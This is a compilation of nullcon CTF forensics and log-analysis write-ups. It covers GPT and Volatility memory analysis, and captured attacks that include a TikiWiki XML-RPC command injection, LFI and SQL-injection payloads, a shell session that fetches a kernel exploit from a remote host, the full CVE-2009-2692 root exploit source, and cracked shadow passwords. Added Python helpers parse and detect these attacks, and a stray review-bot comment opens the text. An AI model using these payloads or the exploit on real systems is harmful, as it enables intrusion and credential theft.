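Review bot: the `}*/` here closes the comment opened in the previous hunk, which leaves `free(sect_buf); free(ent_buf); return 1;` unreachable and means an out-of-range `start_lba` now falls straight through to `tsk_malloc(256)` and is reported as a normal entry; a comment at the commented-out check saying that such rows are unverified would save the next reader from trusting them.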
[nullc0n]$ ./sleuthkit-3.2.3/tools/vstools/mmls -t gpt ./image3.dd
GUID Partition Table (EFI)
Offset Sector: 0
Units are in 512-byte sectors
Slot Start End Length Description
00: Meta 0000000000 0000000000 0000000001 Safety Table
01: ----- 0000000000 0000002047 0000002048 Unallocated
02: Meta 0000000001 0000000001 0000000001 GPT Header
03: Meta 0000000002 0000000004 0000000003 Partition Table
04: 00 0000002048 0098566144 0098564097
05: 08 0098566145 0098568191 0000002047
06: 01 0098568192 0182454271 0083886080
07: 02 0182454272 0203425791 0020971520
08: 03 0203425792 0253757439 0050331648
09: 04 0253757440 0310380543 0056623104
10: 05 0310380544 0352323583 0041943040
11: 06 0352323584 0406849535 0054525952 L
12: 07 0406849536 0488397134 0081547599
Referred to the Wikipedia page on the GUID Partition Table for the partition type UUIDs of the file systems. Mapping done manually.
References:
http://en.wikipedia.org/wiki/Master_boot_record
http://en.wikipedia.org/wiki/GUID_Partition_Table
http://www.aqfire.com/boot/
http://www.digitalforensics.ch/nikkel09.pdf
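Reading the same information straight from the image, as an added example that is not the write-up's code: it checks the EFI PART signature (the error mmls raised first), lists each partition's start and end LBA, names the common type GUIDs, and computes the unpartitioned runs; like the patched mmls it does not require the partitions' own sectors to be present in a truncated image, and a header CRC mismatch after a manual hex edit is reported rather than fatal. The three-sector image is constructed in memory with the partition boundaries from the mmls output above.

```python
import struct
import uuid
import zlib

SECTOR = 512
GPT_SIGNATURE = b"EFI PART"
HEADER_FMT = "<8sIIIIQQQQ16sQIII"   # the 92-byte GPT header stored at LBA 1
ENTRY_FMT = "<16s16sQQQ72s"          # one 128-byte partition entry
LINUX_FS = "0fc63daf-8483-4772-8e79-3d69d8477de4"
TYPE_NAMES = {LINUX_FS: "Linux filesystem",
              "ebd0a0a2-b9e5-4433-87c0-68b6b72699c7": "Microsoft basic data",
              "c12a7328-f81f-11d2-ba4b-00a0c93ec93b": "EFI System"}


def parse_gpt(image, sector=SECTOR):
    """Return (header, partitions); partition data sectors need not exist in the image."""
    hdr = image[sector:sector + struct.calcsize(HEADER_FMT)]
    (sig, _rev, hdr_size, hdr_crc, _res, _cur, _backup, first_usable, last_usable,
     disk_guid, entries_lba, n_entries, entry_size, _ecrc) = struct.unpack(HEADER_FMT, hdr)
    if sig != GPT_SIGNATURE:
        raise ValueError("bad GPT signature %s (mmls: Invalid magic value)" % sig.hex())
    # Header CRC is computed over the header with its own CRC field zeroed.
    crc_ok = zlib.crc32(hdr[:16] + bytes(4) + hdr[20:hdr_size]) & 0xFFFFFFFF == hdr_crc
    start, parts = entries_lba * sector, []
    for i in range(n_entries):
        ent = image[start + i * entry_size:start + (i + 1) * entry_size]
        if len(ent) < entry_size:
            break                                  # table itself cut off by truncation
        type_guid, _guid, first, last, _attr, name = struct.unpack(ENTRY_FMT, ent[:128])
        type_id = str(uuid.UUID(bytes_le=type_guid))
        if type_id == "00000000-0000-0000-0000-000000000000":
            continue                               # unused slot
        parts.append({"slot": i, "type": TYPE_NAMES.get(type_id, type_id), "first_lba": first,
                      "last_lba": last, "name": name.decode("utf-16-le").rstrip("\0")})
    header = {"first_usable": first_usable, "last_usable": last_usable,
              "header_crc_ok": crc_ok, "disk_guid": str(uuid.UUID(bytes_le=disk_guid))}
    return header, parts


def unallocated_runs(header, parts):
    """Usable sector ranges (start, end inclusive) no partition claims: mmls' Unallocated rows."""
    runs, cursor = [], header["first_usable"]
    for p in sorted(parts, key=lambda p: p["first_lba"]):
        if p["first_lba"] > cursor:
            runs.append((cursor, p["first_lba"] - 1))
        cursor = max(cursor, p["last_lba"] + 1)
    if cursor <= header["last_usable"]:
        runs.append((cursor, header["last_usable"]))
    return runs


def build_image(part_ranges, disk_sectors):
    """Constructed image: zeroed protective MBR, header at LBA 1, entries at LBA 2."""
    entries = b"".join(
        struct.pack(ENTRY_FMT, uuid.UUID(LINUX_FS).bytes_le, uuid.UUID(int=i + 1).bytes_le,
                    first, last, 0, ("p%d" % i).encode("utf-16-le").ljust(72, b"\0"))
        for i, (first, last) in enumerate(part_ranges))
    hdr = struct.pack(HEADER_FMT, GPT_SIGNATURE, 0x10000, 92, 0, 0, 1, disk_sectors - 1, 34,
                      disk_sectors - 34, uuid.UUID(int=99).bytes_le, 2, len(part_ranges), 128,
                      zlib.crc32(entries) & 0xFFFFFFFF)
    hdr = hdr[:16] + struct.pack("<I", zlib.crc32(hdr) & 0xFFFFFFFF) + hdr[20:]
    table = entries.ljust(-(-len(entries) // SECTOR) * SECTOR, b"\0")
    return bytes(SECTOR) + hdr.ljust(SECTOR, b"\0") + table
```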
Forensics Level 5: Universal Swindlers Bayonet
Anusandhaanic Daakus Ltd. is a company whose strength lies in the research it conducts. Very often the employees leaving the organisation manage to carry the research data along with them. This time the company decided to go for an investigation and called upon a forensic investigator. The investigator captured a memory dump and shut the system down. On resuming the system he found that the drive had been encrypted, and he is left with only the memory dump.
You as an investigator are required to find out the following information from the dump:
1) Serial no. of the external drive
2) Date and time (IST) when the drive was first connected
3) Date and time (IST) when the drive was last connected
4) Launching which other executable (not nullcon.exe) resulted in the launching of nullcon.exe
Tools Used: strings, grep, Volatility framework
Steps:
[flevel5]$ python ./volatility/trunk/vol.py hivelist -f ./null.img
Volatile Systems Volatility Framework 2.1_alpha
Virtual Physical Name
0x8067b184 0x0067b184 [no name]
0xe19fb380 0x0a1ec380 \Device\HarddiskVolume1\Documents and Settings\user\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1a448d0 0x0a5038d0 \Device\HarddiskVolume1\Documents and Settings\user\NTUSER.DAT
0xe17599f8 0x089629f8 \Device\HarddiskVolume1\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1754008 0x0895b008 \Device\HarddiskVolume1\Documents and Settings\LocalService\NTUSER.DAT
0xe172b430 0x08508430 \Device\HarddiskVolume1\Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1726698 0x083fd698 \Device\HarddiskVolume1\Documents and Settings\NetworkService\NTUSER.DAT
0xe1447008 0x06c9d008 \Device\HarddiskVolume1\WINDOWS\system32\config\software
0xe1447b60 0x06c9db60 \Device\HarddiskVolume1\WINDOWS\system32\config\default
0xe14476b8 0x06c9d6b8 \Device\HarddiskVolume1\WINDOWS\system32\config\SAM
0xe1430330 0x06c90330 \Device\HarddiskVolume1\WINDOWS\system32\config\SECURITY
0xe1331b60 0x02c6eb60 [no name]
0xe101bad8 0x02994ad8 \Device\HarddiskVolume1\WINDOWS\system32\config\system
0xe1008b60 0x029cdb60 [no name]
We find that the SYSTEM hive is located at virtual offset 0xe101bad8. We use this offset to print specific registry keys.
[flevel5]$ python ./volatility/trunk/vol.py printkey -o 0xe101bad8 -K "CurrentControlSet" -f null.img
Volatile Systems Volatility Framework 2.1_alpha
Legend: (S) = Stable (V) = Volatile
----------------------------
Registry: User Specified
Key name: CurrentControlSet (V)
Last updated: 2012-01-06 12:39:30
Subkeys:
Values:
REG_LINK SymbolicLinkValue : (V) \Registry\Machine\System\ControlSet001
[flevel5]$ python ./volatility/trunk/vol.py printkey -o 0xe101bad8 -K "ControlSet001\Control\DeviceClasses" -f null.img
Volatile Systems Volatility Framework 2.1_alpha
Legend: (S) = Stable (V) = Volatile
----------------------------
Registry: User Specified
Key name: DeviceClasses (S)
Last updated: 2012-01-05 13:24:36
Subkeys:
(S) {378de44c-56ef-11d1-bc8c-00a0c91405dd}
(S) {3abf6f2d-71c4-462a-8a92-1e6861e6af27}
(S) {a5dcbf10-6530-11d2-901f-00c04fb951ed}
(S) {f18a0e88-c30c-11d0-8815-00a0c906bed8}
[flevel5]$ python ./volatility/trunk/vol.py printkey -o 0xe101bad8 -K "ControlSet001\Control\DeviceClasses\{a5dcbf10-6530-11d2-901f-00c04fb951ed}" -f null.img
Volatile Systems Volatility Framework 2.1_alpha
Legend: (S) = Stable (V) = Volatile
----------------------------
Registry: User Specified
Key name: {a5dcbf10-6530-11d2-901f-00c04fb951ed} (S)
Last updated: 2012-01-05 13:24:36
Subkeys:
(S) ##?#USB#Vid_0bc2&Pid_2101#2GEL32TN#{a5dcbf10-6530-11d2-901f-00c04fb951ed}
Values:
[flevel5]$ python ./volatility/trunk/vol.py printkey -o 0xe101bad8 -K "ControlSet001\Control\DeviceClasses\{a5dcbf10-6530-11d2-901f-00c04fb951ed}\##?#USB#Vid_0bc2&Pid_2101#2GEL32TN#{a5dcbf10-6530-11d2-901f-00c04fb951ed}" -f null.img
Volatile Systems Volatility Framework 2.1_alpha
Legend: (S) = Stable (V) = Volatile
----------------------------
Registry: User Specified
Key name: ##?#USB#Vid_0bc2&Pid_2101#2GEL32TN#{a5dcbf10-6530-11d2-901f-00c04fb951ed} (S)
Last updated: 2012-01-06 12:22:13
Subkeys:
(S) #
Values:
REG_SZ DeviceInstance : (S) USB\Vid_0bc2&Pid_2101\2GEL32TN
From the above, we find that the serial number of the removable disk is 2GEL32TN.
When it was first connected, the registry key SYSTEM\ControlSet001\Control\DeviceClasses\{a5dcbf10-6530-11d2-901f-00c04fb951ed} was created. Therefore its last update time, 2012-01-05 13:24:36 UTC, is our flag 2 after converting to IST.
Its subkey ##?#USB#Vid_0bc2&Pid_2101#2GEL32TN#{a5dcbf10-6530-11d2-901f-00c04fb951ed} is updated every time the device is connected. Therefore its last update time is our flag 3.
Used pslist in volatility to list processes
Offset(V) Name PID PPID Thds Hnds Time
---------- -------------------- ------ ------ ------ ------ -------------------
0x821c6a00 System 4 0 59 240 1970-01-01 00:00:00
0x81f5fb10 smss.exe 580 4 3 21 2012-01-06 12:39:37
0x81ff92a0 csrss.exe 644 580 11 349 2012-01-06 12:39:38
0x81ff8da0 winlogon.exe 668 580 20 503 2012-01-06 12:39:38
0x81fe35d0 services.exe 712 668 15 258 2012-01-06 12:39:38
0x81feebb8 lsass.exe 724 668 26 343 2012-01-06 12:39:38
0x81fa8ac0 svchost.exe 900 712 20 201 2012-01-06 12:39:38
0x82018438 svchost.exe 968 712 10 227 2012-01-06 12:39:39
0x81f84210 svchost.exe 1056 712 72 1193 2012-01-06 12:39:39
0x82002530 svchost.exe 1176 712 5 58 2012-01-06 12:39:39
0x81fe8620 svchost.exe 1212 712 14 204 2012-01-06 12:39:39
0x81f586f0 spoolsv.exe 1336 712 13 122 2012-01-06 12:39:39
0x81f7a428 explorer.exe 1584 1568 13 374 2012-01-06 12:39:40
0x81b73020 alg.exe 516 712 7 103 2012-01-06 12:39:49
0x81b941e0 nullcon.exe 484 1584 1 22 2012-01-06 12:40:07
0x81b403a8 cmd.exe 1048 1584 1 31 2012-01-06 12:40:13
0x81ba3020 cmd.exe 320 484 1 28 2012-01-06 12:40:20
0x81b7b020 win32dd.exe 856 1048 1 21 2012-01-06 12:40:30
Initially thought flag 4 would be explorer.exe, which is the parent process of nullcon.exe. However, that was not correct.
Used strings and grep to search for nullcon.exe:
[flevel5]$ strings null.img |grep -i nullcon.exe
nullcon.exe
C:\WINDOWS\system32\Nullcon.exe
C:\WINDOWS\system32\Nullcon.exe
nullcon.exe
NULLCON.EXE
C:\WINDOWS\system32\Nullcon.exe
C:\WINDOWS\system32\Nullcon.exe
Nullcon.exe
C:\WINDOWS\system32\Nullcon.exe
Nullcon.exe "C:\WINDOWS\system32\mshearts.exe"
Nullcon.exe
This gives us flag 4: mshearts.exe
References:
1. https://blogs.sans.org/computer-forensics/files/2009/08/usb_device_forensics_xp_guide.pdf
2. http://cse.spsu.edu/raustin2/coursefiles/forensics/How_to_use_Volatility_v2.pdf
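The two pieces of post-processing the write-up does by hand, as an added example that is not the write-up's code: pulling VID, PID and serial out of the DeviceClasses subkey name and converting the key timestamps (Volatility prints UTC) to IST, plus walking the pslist parent chain for a process. The printkey and pslist excerpts are constructed in the shape of Volatility 2.x output with the values shown above; the serial check (an instance id with '&' in second position is Windows-generated, not a device serial) is a standard USB forensics caveat, not something from the page.

```python
import re
from datetime import datetime, timedelta, timezone

IST = timezone(timedelta(hours=5, minutes=30))

# Constructed excerpts in the shape of Volatility 2.x printkey / pslist output.
CLASS_KEY = """Key name: {a5dcbf10-6530-11d2-901f-00c04fb951ed} (S)
Last updated: 2012-01-05 13:24:36
Subkeys:
  (S) ##?#USB#Vid_0bc2&Pid_2101#2GEL32TN#{a5dcbf10-6530-11d2-901f-00c04fb951ed}
Values:
"""
DEVICE_KEY = """Key name: ##?#USB#Vid_0bc2&Pid_2101#2GEL32TN#{a5dcbf10-6530-11d2-901f-00c04fb951ed} (S)
Last updated: 2012-01-06 12:22:13
Subkeys:
  (S) #
Values:
REG_SZ        DeviceInstance  : (S) USB\\Vid_0bc2&Pid_2101\\2GEL32TN
"""
PSLIST = """Offset(V)  Name                 PID  PPID Thds Hnds Time
---------- -------------------- ---- ---- ---- ---- -------------------
0x81f7a428 explorer.exe         1584 1568   13  374 2012-01-06 12:39:40
0x81b941e0 nullcon.exe           484 1584    1   22 2012-01-06 12:40:07
0x81b403a8 cmd.exe              1048 1584    1   31 2012-01-06 12:40:13
0x81ba3020 cmd.exe               320  484    1   28 2012-01-06 12:40:20
0x81b7b020 win32dd.exe           856 1048    1   21 2012-01-06 12:40:30
"""
USB_ID_RE = re.compile(r"USB#Vid_([0-9A-Fa-f]{4})&Pid_([0-9A-Fa-f]{4})#([^#]+)#")


def last_updated_ist(printkey_text):
    """Key timestamp from printkey output, converted from UTC to IST (UTC+05:30)."""
    m = re.search(r"Last updated:\s+(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)", printkey_text)
    utc = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
    return utc.astimezone(IST).strftime("%Y-%m-%d %H:%M:%S")


def usb_devices(printkey_text):
    """VID/PID/serial of each USB device instance named in the output; 'serial_unique' is
    False when the id is Windows-generated ('&' in second position) rather than a real serial."""
    return [{"vid": v.lower(), "pid": p.lower(), "serial": s,
             "serial_unique": not (len(s) > 1 and s[1] == "&")}
            for v, p, s in USB_ID_RE.findall(printkey_text)]


def parse_pslist(text):
    """Map PID -> (name, PPID), skipping the header and separator lines."""
    procs = {}
    for line in text.splitlines():
        f = line.split()
        if len(f) < 8 or not f[0].startswith("0x"):
            continue
        procs[int(f[2])] = (f[1], int(f[3]))
    return procs


def parent_chain(procs, name):
    """Ancestor names of the first process called `name`, nearest first; stops when the
    parent is no longer in the list (it has exited, as with explorer's parent here)."""
    pid = next((p for p, (n, _) in procs.items() if n.lower() == name.lower()), None)
    chain = []
    while pid in procs and procs[pid][1] in procs:
        pid = procs[pid][1]
        chain.append(procs[pid][0])
    return chain
```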
Log Analysis Level 1: Basic
Log URL: http://www.nullcon.net/challenge/data/report
Found interesting line in log:
+ OSVDB-3268: GET /challenge/logically_insane/ : Directory indexing is enabled: /challenge/logically_insane/
Found askmelate.asp in /challenge/logically_insane
Clue: Ask the proper question to get the proper answer<!-- askmelater.asp?question=? -->
Question: How to find the flag?
http://www.nullcon.net/challenge/logically_insane/askmelater.asp?question=how%20to%20find%20the%20flag?
Flag: 6bb61e3b7bce0931da574d19d1d82c88
Log Analysis Level 2: Mystery Password
Find password for user suppadmin
Log URL: http://www.nullcon.net/challenge/data/log3.pcap
Tools Used: Wireshark
Steps: Open file in wireshark.
Flag: ..Supp@..adm1n # Flag includes the dots
Log Analysis Level 3: Clever Intruder
Log URL: http://www.nullcon.net/challenge/data/access.rar
Only 3 IPs were found in log. Started with 192.168.0.107
[nullc0n]$ cat access.log |grep 192.168.0.107
<extension>php</extension>
<request><![CDATA[POST /tikiwiki/scripts/server.php HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: 192.168.221.154
User-Agent: Internet Explorer 6.0
Content-Length: 360
<?xml version="1.0"?><methodCall><methodName>foo.bar</methodName><params><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><name>','')); system('id'); die; /*</name></value></param></params></methodCall>]]></request>
<status>200</status>
<responselength>283</responselength>
<mimetype>text</mimetype>
<response><![CDATA[HTTP/1.1 200 OK
Date: Thu, 12 Jan 2012 07:24:16 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Connection: close
Content-Type: text/html
Content-Length: 54
uid=33(www-data) gid=33(www-data) groups=33(www-data)
]]></response>
<comment></comment>
</item>
From the above it looks like a code execution bug in the XML-RPC library used by TikiWiki. A Google search yielded CVE-2005-1921.
Flag: CVE-2005-1921
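Detection logic for this request shape in logs, as an added example that is not part of the write-up: it splits the body off a captured HTTP request, parses the XML-RPC methodCall, and flags any `<name>` whose text is not an identifier-like member name as well as any parameter text that contains a PHP function call, which is exactly what separates the request above from a legitimate call. The request bodies are constructed; the hostile one mirrors the page's.

```python
import re
import xml.etree.ElementTree as ET

# Constructed bodies: the first mirrors the TikiWiki request on the page, the second
# is a well-formed struct parameter such as a legitimate client would send.
SAMPLE_BODY = ('<?xml version="1.0"?><methodCall><methodName>foo.bar</methodName><params>'
               + '<param><value><string>1</string></value></param>' * 4
               + "<param><value><name>','')); system('id'); die; /*</name></value></param>"
               + '</params></methodCall>')
BENIGN_BODY = ('<?xml version="1.0"?><methodCall><methodName>wiki.getPage</methodName>'
               '<params><param><value><struct><member><name>id</name>'
               '<value><int>1</int></value></member></struct></value></param></params></methodCall>')

# A struct member name is an identifier-like token; quotes, parentheses or ';' do not belong.
MEMBER_NAME_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_.-]*$")
PHP_CALL_RE = re.compile(r"\b(system|exec|passthru|shell_exec|eval)\s*\(", re.I)


def extract_body(http_request):
    """Body of an HTTP request captured as text: everything after the first blank line."""
    parts = re.split(r"\r?\n\r?\n", http_request, 1)
    return parts[1].lstrip() if len(parts) == 2 else ""


def inspect_xmlrpc(body):
    """List of (finding, methodName, offending text); empty when nothing looks hostile."""
    findings = []
    root = ET.fromstring(body)
    if root.tag != "methodCall":
        return [("not a methodCall", root.tag, "")]
    method = root.findtext("methodName", "")
    for el in root.iter():
        text = (el.text or "").strip()
        if el.tag == "name" and not MEMBER_NAME_RE.match(text):
            findings.append(("malformed member name", method, text))
        if PHP_CALL_RE.search(text):
            findings.append(("php call in parameter", method, text))
    return findings
```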
Log Analysis Level 5: Waat Laga Server
Log URL: http://www.nullcon.net/challenge/data/dump.rar
Flag-I: Vulnerable Parameter in 1st Attack
Flag-II: Vulnerable Parameter in 2nd Attack
Flag-III: Names of the people who discovered the Local Privilege Escalation Exploit used
Flag-IV: root Password
Tools Used: Wireshark, john
Loaded the file in Wireshark, sorted the packets by size and used Follow TCP Stream to analyse the sessions, starting with the largest ones. Found the following in one such TCP stream:
sh: no job control in this shell
sh-3.1$ id
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_sys_script_t
sh-3.1$ uname -a
Linux ctf4.sas.upenn.edu 2.6.15-1.2054_FC5 #1 Tue Mar 14 15:48:33 EST 2006 i686 i686 i386 GNU/Linux
sh-3.1$ cd /tmp/
sh-3.1$ ls -la
total 904
drwxrwxrwt 15 root root 4096 Jan 11 10:07 .
drwxr-xr-x 23 root root 4096 Jan 11 09:38 ..
drwxrwxrwt 2 root root 4096 Jan 11 07:15 .ICE-unix
-r--r--r-- 1 root root 11 Jan 11 07:07 .X0-lock
drwxrwxrwt 2 root root 4096 Jan 11 07:07 .X11-unix
drwxrwxrwt 2 root root 4096 Jan 11 07:06 .font-unix
srw-rw-rw- 1 root root 0 Jan 11 07:07 .gdm_socket
drwx------ 2 root root 4096 Mar 6 2009 .mozilla
-rw-rw-rw- 1 mysql mysql 13 Jan 11 09:57 1.txt
-rw-rw-rw- 1 mysql mysql 36 Jan 11 09:58 2.txt
drwx------ 2 achen achen 4096 Mar 10 2009 gconfd-achen
drwx------ 2 dstevens dstevens 4096 Mar 11 2009 gconfd-dstevens
drwx------ 2 ghighland ghighland 4096 Mar 10 2009 gconfd-ghighland
drwx------ 2 root root 4096 Mar 18 2009 gconfd-root
drwx------ 3 sorzek sorzek 4096 Jan 11 07:15 gconfd-sorzek
drwx------ 2 sorzek sorzek 4096 Jan 11 07:15 keyring-FiP3XI
srwxrwxr-x 1 achen achen 0 Mar 10 2009 mapping-achen
srwxrwxr-x 1 dstevens dstevens 0 Mar 11 2009 mapping-dstevens
srwxrwxr-x 1 ghighland ghighland 0 Mar 10 2009 mapping-ghighland
srwxr-xr-x 1 root root 0 Mar 18 2009 mapping-root
srwxrwxr-x 1 sorzek sorzek 0 Jan 11 07:15 mapping-sorzek
drwx------ 2 sorzek sorzek 4096 Jan 11 07:16 orbit-sorzek
-rwsr-xr-x 1 root root 720888 Jan 11 10:09 sh
drwx------ 2 sorzek sorzek 4096 Jan 11 07:15 ssh-yXwuKb2964
-rw-rw-rw- 1 mysql mysql 13 Jan 11 10:07 test1.txt
-rw-rw-rw- 1 mysql mysql 36 Jan 11 10:07 test2.txt
drwx------ 2 sorzek sorzek 4096 Jan 11 07:15 virtual-sorzek.7IeXOH
-rw------- 1 sorzek sorzek 1062 Jan 11 08:15 xses-sorzek.HeSMY4
sh-3.1$ wget http://192.168.221.130/exploit/9479.c
--10:09:30-- http://192.168.221.130/exploit/9479.c
=> `9479.c'
Connecting to 192.168.221.130:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,379 (3.3K) [text/x-csrc]
0K ... 100% 61.97 MB/s
10:09:30 (61.97 MB/s) - `9479.c' saved [3379/3379]
sh-3.1$ gcc 9479.c -o root
sh-3.1$ ./root
sh: no job control in this shell
ossecm:!!:14312:0:99999:7:::
ossecr:!!:14312:0:99999:7:::
sh-3.1# exit
exit
sh-3.1$ exit
exit
Copied /etc/shadow to pass.txt and cracked it with john (http://www.openwall.com/john/) using the downloaded wordlist http://download.openwall.net/pub/wordlists/all.gz.
[nullc0n]$ john -show pass.txt
root:zuzana:15350:0:99999:7:::
sorzek:pacman:14312:0:99999:7:::
2 password hashes cracked, 5 left
This gives us Flag IV: zuzana
In another TCP session we got:
HTTP/1.1 200 OK
Date: Thu, 12 Jan 2012 06:18:26 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 11 Jan 2012 12:36:23 GMT
ETag: "41d4c-d33-4b63fe12b3b1c"
Accept-Ranges: bytes
Content-Length: 3379
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/x-csrc
/*
**
** 0x82-CVE-2009-2692
** Linux kernel 2.4/2.6 (32bit) sock_sendpage() local ring0 root exploit (simple ver)
** Tested RedHat Linux 9.0, Fedora core 4~11, Whitebox 4, CentOS 4.x.
**
** --
** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.
** spender and venglin's code is very excellent.
** Thankful to them.
**
** Greets: Brad Spengler <spender(at)grsecurity(dot)net>,
** Przemyslaw Frasunek <venglin(at)czuby(dot)pl>.
** --
** exploit by <p0c73n1(at)gmail(dot)com>.
**
** "Slow and dirty exploit for this one"
**
*/
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <sys/personality.h>
unsigned int uid, gid;
void kernel_code()
{
    unsigned long where=0;
    unsigned long *pcb_task_struct;
    where=(unsigned long )&where;
    where&=~8191;
    pcb_task_struct=(unsigned long *)where;
    while(pcb_task_struct){
        if(pcb_task_struct[0]==uid&&pcb_task_struct[1]==uid&&
            pcb_task_struct[2]==uid&&pcb_task_struct[3]==uid&&
            pcb_task_struct[4]==gid&&pcb_task_struct[5]==gid&&
            pcb_task_struct[6]==gid&&pcb_task_struct[7]==gid){
            pcb_task_struct[0]=pcb_task_struct[1]=pcb_task_struct[2]=pcb_task_struct[3]=0;
            pcb_task_struct[4]=pcb_task_struct[5]=pcb_task_struct[6]=pcb_task_struct[7]=0;
            break;
        }
        pcb_task_struct++;
    }
    return;
    /*
    ** By calling iret after pushing a register into kernel stack,
    ** We don't have to go back to ring3(user mode) privilege level. dont worry. :-}
    **
    ** kernel_code() function will return to its previous status which means before sendfile() system call,
    ** after operating upon a ring0(kernel mode) privilege level.
    ** This will enhance the viablity of the attack code even though each kernel can have different CS and DS address.
    */
}
void *kernel=kernel_code;
int main(int argc,char *argv[])
{
    int fd_in=0,fd_out=0,offset=1;
    void *zero_page;
    uid=getuid();
    gid=getgid();
    if(uid==0){
        fprintf(stderr,"[-] check ur uid\n");
        return -1;
    }
    /*
    ** There are some cases that we need mprotect due to the dependency matter with SVR4. (however, I did not confirm it yet)
    */
    if(personality(0xffffffff)==PER_SVR4){
        if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){
            perror("[-] mprotect()");
            return -1;
        }
    }
    else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){
        perror("[-] mmap()");
        return -1;
    }
    *(char *)0x00000000=0xff;
    *(char *)0x00000001=0x25;
    *(unsigned long *)0x00000002=(unsigned long)&kernel;
    *(char *)0x00000006=0xc3;
    if((fd_in=open(argv[0],O_RDONLY))==-1){
        perror("[-] open()");
        return -1;
    }
    if((fd_out=socket(PF_APPLETALK,SOCK_DGRAM,0))==-1){
        if((fd_out=socket(PF_BLUETOOTH,SOCK_DGRAM,0))==-1){
            perror("[-] socket()");
            return -1;
        }
    }
gogossing:
    /*
    ** Sometimes, the attacks can fail. To enlarge the possiblilty of attack,
    ** an attacker can make all the processes runing under current user uid 0.
    */
    if(sendfile(fd_out,fd_in,&offset,2)==-1){
        if(offset==0){
            perror("[-] sendfile()");
            return -1;
        }
        close(fd_out);
        fd_out=socket(PF_BLUETOOTH,SOCK_DGRAM,0);
    }
    if(getuid()==uid){
        if(offset){
            offset=0;
        }
        goto gogossing; /* all process */
    }
    close(fd_in);
    close(fd_out);
    execl("/bin/sh","sh","-i",NULL);
    return 0;
}
/* eoc */
// milw0rm.com [2009-08-24]
This gives us Flag III as Tavis Ormandy and Julien Tinnes
Another TCP session gave the following:
GET /index.html?page=../../../../../../../../../tmp/test2.txt%00&c=ls HTTP/1.1
Host: 192.168.221.143
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 11 Jan 2012 15:08:00 GMT
Server: Apache/2.2.0 (Fedora)
X-Powered-By: PHP/5.1.2
Content-Length: 1373
</table>
<h1 class="title">Professor Ehks Center for Data Studies</h1>
<div id="main">
1.<br />
<b>Notice</b>: Use of undefined constant c - assumed 'c' in <b>/tmp/test2.txt</b> on line <b>1</b><br />
admin
calendar
conf
images
inc
index.html
index.html.bak
mail
pages
restricted
robots.txt
sql
.3.4.5
</div>
<div id="center" style="text-align:center;width:100%"><a href="mailto:webmaster@localhost">webmaster</a></div>
</body>
</html>
The above shows that there is a flaw in the page parameter.
Another attack targeted the id parameter, as shown below:
GET /index.html?page=blog&title=Blog&id=2+AND+1=2+UNION+ALL+SELECT+1,%27test%27,3,4,5+INTO+OUTFILE+%27/tmp/test1.txt%27--+- HTTP/1.1
Host: 192.168.221.143
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 11 Jan 2012 15:07:02 GMT
Server: Apache/2.2.0 (Fedora)
X-Powered-By: PHP/5.1.2
Content-Length: 1336
Connection: close
Content-Type: text/html; charset=UTF-8
<html>
<head>
<title> Prof. Ehks
Blog</title>
<style type="text/css">
BODY {
    font-family: helvetica, arial;
    padding: 0px;
    margin: 0px;
}
TABLE.nav {
    background-color: #336699;
}
TABLE.nav a {
    color: white;
    text-decoration: none;
}
H1.title {
    width: 100%;
    background-color: #6699cc;
    padding: 5px;
    margin: 0px;
    border-bottom: 3px solid #113366;
}
DIV#main {
    margin: 5px;
}
</style>
</head>
Similarly there were other attacks as shown below
From the above we can infer that the attack on parameter id was carried out before the attack on parameter page: the attacker first exploited the SQL injection flaw.
Therefore the flags are:
Flag I: id
Flag II: page
Flag III: Tavis Ormandy and Julien Tinnes
Flag IV: zuzana
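The same two findings pulled out of a web server log rather than by reading TCP streams, as an added example that is not the write-up's code: it decodes each request's query string, classifies every parameter value as SQL injection (UNION/SELECT, INTO OUTFILE) or file inclusion (traversal, embedded null byte), and orders the hits by timestamp so the first attacked parameter comes first. The access-log lines are constructed from the two request lines and timestamps shown above.

```python
import re
from datetime import datetime
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines: the two requests from the pcap plus one benign request.
SAMPLE_LOG = [
    '192.168.221.130 - - [11/Jan/2012:15:07:02 +0000] "GET /index.html?page=blog&title=Blog'
    '&id=2+AND+1=2+UNION+ALL+SELECT+1,%27test%27,3,4,5+INTO+OUTFILE+%27/tmp/test1.txt%27--+- HTTP/1.1" 200 1336',
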